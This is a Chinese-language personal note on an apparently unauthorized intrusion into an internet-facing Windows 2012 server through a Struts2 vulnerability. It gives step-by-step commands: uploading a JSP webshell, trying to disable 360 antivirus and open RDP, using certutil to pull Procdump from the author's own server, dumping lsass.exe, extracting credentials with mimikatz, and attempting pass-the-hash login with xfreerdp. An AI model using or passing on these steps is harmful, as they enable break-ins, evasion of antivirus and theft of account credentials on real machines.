Struts2漏洞渗透笔记
虽然这是一次失败的渗透,但是也学到不少新姿势。
目标机环境:①外网②win2012③360全家桶
一,利用Struts2终极利用工具上传一句话
jsp的一句话,有时候会出现兼容问题。比如Cknife的jsp一句话,K8飞刀就连接不了。我这里以Cknife为例子
二,一顿操作,虽然是最高权限,但是net被禁用。tasklist发现有360全家桶
①尝试用cacls.exe修改net.exe控制权限(失败)
②尝试关掉sc config 360rp start= demand(拒绝访问)
③CMD注册表开3389(失败)
④bat,vbs开3389(失败)
⑤上传open3389.exe(被杀)
三,创建用户没戏,就想着利用procdump+Mimikatz 绕过杀软获取Windows明文密码。
①procdump下载地址https://download.sysinternals.com/files/Procdump.zip
②解压好后,把Procdump.exe上传到目标机
③由于Struts2框架的问题。上传文件老是失败,我事先将Procdump.exe传到自己的VPS上
④在C刀命令行输入D:\>certutil -urlcache -split -f https://xxx.com/files/Procdump.exe
⑤Procdump.exe -accepteula -ma lsass.exe lsass.dmp
⑥运行mimikatz解密lsass.dmp
用菜刀把lsaass.dmp下载并放到mimikatz.exe的目录,然后输入命令:
sekurlsa::minidump lsaass.dmp
sekurlsa::logonPasswords full
⑦后来才知道win2012修补了漏洞,lsass.dmp再也没有明文密码。得到的NTLM和SHA1值也跑不出
四,跑不出明文,只能Hash传递攻击Windows2012远程桌面
①kali安装使用freerdp
apt-get install freerdp-x11
xfreerdp -u admin -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129
可惜最后还是失败了,暂且想不到其他的操作。360还是强啊
参考:①http://www.91ri.org/14342.html
②https://www.cnblogs.com/backlion/p/7325228.html
③http://www.freebuf.com/sectool/105524.html